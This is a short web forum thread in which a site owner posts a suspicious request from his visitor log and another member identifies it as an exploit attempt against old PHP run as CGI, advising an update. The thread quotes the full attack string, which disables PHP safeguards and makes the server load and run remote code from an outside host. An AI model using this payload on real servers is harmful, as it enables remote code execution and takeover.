Post by zigzag253 » Sun Mar 13, 2016 3:43 am

Hello:-

Just saw this pop up on a visitor tracker programme. I don't know what is being tried but is there anything I need to check/do? (asterisks = my IP address) Thanks for any help.

http://***.***.***.***/cgi-bin
/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin
.simulation%3Don+-d+max_execution_time%3D0+-d+disable_functi
ons%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3D
http://hecks.ddosdev.net/
ok.txt+-d+cgi.force_redirect%3
D0+-d+cgi.redirect_status_env%
3D0+-n

Newbie

Posts

Joined
Tue Jan 22, 2013 7:52 am

Post by ADD Creative » Sun Mar 13, 2016 11:08 pm

Looks like an attempt to exploit a bug in old PHP version when used as CGI. Check that you are not running an old out of date version on PHP on your server.

A quick web search brings up many pages like this.
http://stackoverflow.com/questions/2083 ... to-hack-me

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom
Who is online

Users browsing this forum: Bing [Bot] and 176 guests